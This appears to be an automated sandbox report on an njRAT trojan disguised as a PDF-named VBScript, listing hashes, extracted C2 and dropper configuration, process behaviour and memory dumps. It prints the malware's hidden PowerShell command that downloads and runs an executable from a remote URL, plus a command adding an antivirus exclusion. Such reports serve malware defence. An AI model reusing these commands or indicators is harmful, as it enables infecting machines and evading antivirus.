njrat | c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994

Analysis

max time kernel
148s
max time network
149s
platform
windows10_x64
resource
win10-en
submitted
15-09-2021 12:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Documentacion.PDF.vbs
Size

162KB
MD5

16dd6afc5e63f4edc4f35fd1176e63bd
SHA1

d64a9461b703119695e76f880832924d487a648a
SHA256

c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994
SHA512

3e2abe804b90ec51e1a7fb4145a0b11304e3d279c13cc3f65380721c079fb1b9711bb491e92b5e95c6ca957aeb7bfed9b33b030c094a1dcc3d4ebcab577b8df3

Score

10^/10

njrat nyan cat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

pedrobedoya2021.duckdns.org:1980

Mutex

cf13c225ff474d45b

Attributes

reg_key
cf13c225ff474d45b
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 4736 powershell.exe
9 4736 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

Hostdyn.exeHostdyn.exeHostdyn.exeHostdyn.exe

pid process

5008 Hostdyn.exe
3376 Hostdyn.exe
3352 Hostdyn.exe
3336 Hostdyn.exe

flow	pid	process
7	4736	powershell.exe
9	4736	powershell.exe

pid	process
5008	Hostdyn.exe
3376	Hostdyn.exe
3352	Hostdyn.exe
3336	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 5008 set thread context of 3336 5008 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 5008 set thread context of 3336	5008	Hostdyn.exe	Hostdyn.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exeHostdyn.exepowershell.exe

pid	process
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
5008	Hostdyn.exe
5008	Hostdyn.exe
5008	Hostdyn.exe
5008	Hostdyn.exe
2700	powershell.exe
2700	powershell.exe
2700	powershell.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

powershell.exeHostdyn.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	5008	Hostdyn.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe
Token: 33	3336	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3336	Hostdyn.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exe

description	pid	process	target process
PID 4684 wrote to memory of 4736	4684	WScript.exe	powershell.exe
PID 4684 wrote to memory of 4736	4684	WScript.exe	powershell.exe
PID 4736 wrote to memory of 5008	4736	powershell.exe	Hostdyn.exe
PID 4736 wrote to memory of 5008	4736	powershell.exe	Hostdyn.exe
PID 4736 wrote to memory of 5008	4736	powershell.exe	Hostdyn.exe
PID 5008 wrote to memory of 2700	5008	Hostdyn.exe	powershell.exe
PID 5008 wrote to memory of 2700	5008	Hostdyn.exe	powershell.exe
PID 5008 wrote to memory of 2700	5008	Hostdyn.exe	powershell.exe
PID 5008 wrote to memory of 3376	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3376	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3376	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3352	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3352	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3352	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe
PID 5008 wrote to memory of 3336	5008	Hostdyn.exe	Hostdyn.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Documentacion.PDF.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2700
  - - C:\Users\Admin\AppData\Roaming\Hostdyn.exe
      "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
      4⤵
      Executes dropped EXE
      PID:3376
  - - C:\Users\Admin\AppData\Roaming\Hostdyn.exe
      "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3336
  - - C:\Users\Admin\AppData\Roaming\Hostdyn.exe
      "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
      4⤵
      Executes dropped EXE
      PID:3352

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hostdyn.exe.log

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ddcaff8849639da0fcfaaf1f8977baa9

SHA1
e3a1b28dfa55ff65161f7aaaff4c265b868c674d

SHA256
5dfa5833116f15d0e8114c62902399a1ed0ee01e68e5ab8261b559ffed5380f5

SHA512
7e6929ba6f089b693a00abf89853ecff6452b5f9e9ffe8f72ac3cb61c263ab7f0fda0fd76dc4a8d3db0bc66b682afa3a2fe88a666f406e2cc2bddc491db7e4a1

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
memory/2700-186-0x00000000070A0000-0x00000000070A1000-memory.dmp

Filesize
4KB

Download
memory/2700-187-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

Filesize
4KB

Download
memory/2700-177-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/2700-404-0x00000000091D0000-0x00000000091D1000-memory.dmp

Filesize
4KB

Download
memory/2700-279-0x0000000001013000-0x0000000001014000-memory.dmp

Filesize
4KB

Download
memory/2700-210-0x0000000009240000-0x0000000009241000-memory.dmp

Filesize
4KB

Download
memory/2700-178-0x00000000070C0000-0x00000000070C1000-memory.dmp

Filesize
4KB

Download
memory/2700-208-0x0000000009060000-0x0000000009061000-memory.dmp

Filesize
4KB

Download
memory/2700-203-0x0000000008EF0000-0x0000000008EF1000-memory.dmp

Filesize
4KB

Download
memory/2700-196-0x0000000008F10000-0x0000000008F43000-memory.dmp

Filesize
204KB

Download
memory/2700-188-0x0000000007FB0000-0x0000000007FB1000-memory.dmp

Filesize
4KB

Download
memory/2700-164-0x0000000000000000-mapping.dmp

Download
memory/2700-184-0x0000000001012000-0x0000000001013000-memory.dmp

Filesize
4KB

Download
memory/2700-179-0x0000000006EC0000-0x0000000006EC1000-memory.dmp

Filesize
4KB

Download
memory/2700-183-0x0000000001010000-0x0000000001011000-memory.dmp

Filesize
4KB

Download
memory/2700-182-0x00000000078D0000-0x00000000078D1000-memory.dmp

Filesize
4KB

Download
memory/2700-181-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/2700-180-0x0000000006F60000-0x0000000006F61000-memory.dmp

Filesize
4KB

Download
memory/2700-410-0x00000000091C0000-0x00000000091C1000-memory.dmp

Filesize
4KB

Download
memory/2700-209-0x000000007EDF0000-0x000000007EDF1000-memory.dmp

Filesize
4KB

Download
memory/3336-168-0x000000000040677E-mapping.dmp

Download
memory/3336-167-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3336-426-0x0000000005850000-0x0000000005D4E000-memory.dmp

Filesize
5.0MB

Download
memory/4736-120-0x0000019344AB0000-0x0000019344AB1000-memory.dmp

Filesize
4KB

Download
memory/4736-123-0x000001932C380000-0x000001932C382000-memory.dmp

Filesize
8KB

Download
memory/4736-115-0x0000000000000000-mapping.dmp

Download
memory/4736-127-0x0000019344C60000-0x0000019344C61000-memory.dmp

Filesize
4KB

Download
memory/4736-133-0x000001932C386000-0x000001932C388000-memory.dmp

Filesize
8KB

Download
memory/4736-125-0x000001932C383000-0x000001932C385000-memory.dmp

Filesize
8KB

Download
memory/5008-156-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/5008-162-0x00000000071C0000-0x0000000007214000-memory.dmp

Filesize
336KB

Download
memory/5008-161-0x00000000052C0000-0x00000000057BE000-memory.dmp

Filesize
5.0MB

Download
memory/5008-160-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/5008-159-0x00000000053C0000-0x00000000053C7000-memory.dmp

Filesize
28KB

Download
memory/5008-158-0x00000000051A0000-0x00000000051A1000-memory.dmp

Filesize
4KB

Download
memory/5008-157-0x00000000051B0000-0x00000000051B1000-memory.dmp

Filesize
4KB

Download
memory/5008-163-0x00000000089A0000-0x00000000089BF000-memory.dmp

Filesize
124KB

Download
memory/5008-154-0x00000000007C0000-0x00000000007C1000-memory.dmp

Filesize
4KB

Download
memory/5008-150-0x0000000000000000-mapping.dmp

Download